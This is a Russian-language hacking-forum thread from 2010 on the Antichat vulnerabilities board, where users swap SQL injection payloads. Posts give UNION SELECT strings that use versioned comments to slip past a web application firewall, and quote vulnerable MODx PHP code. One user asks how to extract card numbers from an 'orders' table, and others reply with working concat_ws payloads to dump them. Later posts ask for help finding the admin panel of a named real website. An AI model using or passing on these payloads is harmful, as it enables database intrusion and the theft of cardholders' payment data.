ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2010, 23:33
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
респект /*!UnIoN+SeLeCt*/)) лови +
думаю скоро он опять появится...
т.к. дальше наверно тож будет фильтр
 
Ответить с цитированием

  #2  
Старый 16.06.2010, 23:34
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
мэн там нету скули
На хакер.ру ошиблись? Или сайт для примера с закрытой дыркой?
 
Ответить с цитированием

  #3  
Старый 16.06.2010, 23:56
Аватар для BlackFan
BlackFan
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442

Репутация: 41
По умолчанию

Цитата:
Сообщение от CyberHunter  
На хакер.ру ошиблись? Или сайт для примера с закрытой дыркой?
Инъекция есть...
Но чтобы ее использовать надо как минимум
1) доступ в админку
2) magic_quotes = Off

mutate_templates.dynamic.php
PHP код:
if ($_REQUEST['a'] == 16) { 
    
$sql "SELECT tv.name as 'name', tv.id as 'id', tr.templateid, tr.rank, if(isnull(cat.category),'".$_lang['no_category']."',cat.category) as category
    FROM "
.$modx->getFullTableName('site_tmplvar_templates')." tr
    INNER JOIN "
.$modx->getFullTableName('site_tmplvars')." tv ON tv.id = tr.tmplvarid
    LEFT JOIN "
.$modx->getFullTableName('categories')." cat ON tv.category = cat.id
    WHERE tr.templateid='"
.$_REQUEST['id']."' ORDER BY tr.rank ASC";

$rs $modx->db->query($sql); 
 
Ответить с цитированием

  #4  
Старый 16.06.2010, 23:36
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Может, дашь акк тестовый? Ибо без логина там и крутить нечего
 
Ответить с цитированием

  #5  
Старый 17.06.2010, 01:33
Аватар для manerus
manerus
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247

Репутация: 1
По умолчанию

вот что получилось
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1--

выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс?

зы голова не соображает ладно "утро вечера мудренее"
 
Ответить с цитированием

  #6  
Старый 17.06.2010, 02:17
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Цитата:
Сообщение от manerus  
вот что получилось
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1--

выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс?

зы голова не соображает ладно "утро вечера мудренее"
concat_ws (0x3a,cc_type,cc_number,cc_owner,cc_expires) from orders
 
Ответить с цитированием

  #7  
Старый 17.06.2010, 02:21
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt+concat_ws(0x3a,cc_type,cc_number,cc _owner,cc_expires),2,3,4+from+orders+limit+0,1*/+--+


Если принтабельна первая колонка
И не извращайся с псевдокомментами, хватит одного для обхода WAF
 
Ответить с цитированием

  #8  
Старый 17.06.2010, 16:12
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP
 
Ответить с цитированием

  #9  
Старый 17.06.2010, 16:35
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от pinch  
хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP
https://forum.antichat.ru/threadnav31427-1-10.html
 
Ответить с цитированием

  #10  
Старый 17.06.2010, 17:21
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

http://www.fragrance.org/

помогите найти админку))

директория phpmyadmin и members не интересует=)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ